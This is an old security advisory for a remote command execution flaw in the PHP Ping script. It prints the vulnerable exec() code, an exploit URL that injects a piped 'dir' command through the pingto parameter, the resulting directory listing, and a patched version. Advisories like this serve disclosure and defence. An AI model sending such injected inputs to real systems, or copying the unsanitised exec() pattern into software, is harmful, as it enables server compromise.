|
COMMAND PHP Ping Remote Command Execution SYSTEMS AFFECTED PHP Ping v0.1 and prior PROBLEM Thanks to Grégory Le Bras aka GaLiaRePt of Security Corporation in security advisory [SCSA-009] : http://www.security-corp.org/advisories/SCSA-009-FR.txt PHP ping "will allow you, provided that your server turns under Windows, to realize a "ping" on the host of your choice." (direct quote from PHP Ping website) DETAILS ________________________________________________________________________ A vulnerability have been found in PHP ping which allow attackers to execute remote command. This vulnerability would allow a remote attacker to compromise parts of the operating system, possibly the complete operating system. Vulnerable code : <? //************************************* // FONCTION DU PING //************************************* function PHPing($cible,$pingFile){ exec("ping -a -n 1 $cible >$pingFile", $list); $fd = fopen($pingFile, "r"); while(!feof($fd)) { $ping.= fgets($fd,256); } fclose($fd); return $ping; } //------------------------------------- ?> EXPLOIT ________________________________________________________________________ The vulnerability was discovered in the page for execute "ping", at this adress : http://[target]/phpping/index.php?pingto=www.security-corp.org%20|%20dir This exploit simply show the contents of the current repertory. c:\phpping 03/03/2003 23:01 <DIR> . 03/03/2003 23:01 <DIR> .. 03/03/2003 23:00 <DIR> img 30/04/2002 23:13 3217 index.php 30/04/2002 23:19 921 README 03/03/2003 23:03 0 resultat.ping 3 file(s) 4138 bytes 3 Dir(s) 11413962752 bytes free SOLUTION For example use this code : <? //************************************* // FONCTION DU PING //************************************* function PHPing($cible,$pingFile){ # BugFix by Gregory LEBRAS www.security-corp.org if( (!$cible) || (!preg_match("/^[\w\d\.\-]+\.[\w\d]{1,3}$/i",$cible)) ){ echo("Error: Please specify a valid target host or IP."); exit; } else { exec("ping -a -n 1 $cible >$pingFile", $list); $fd = fopen($pingFile, "r"); while(!feof($fd)) { $ping.= fgets($fd,256); } fclose($fd); return $ping; } } //------------------------------------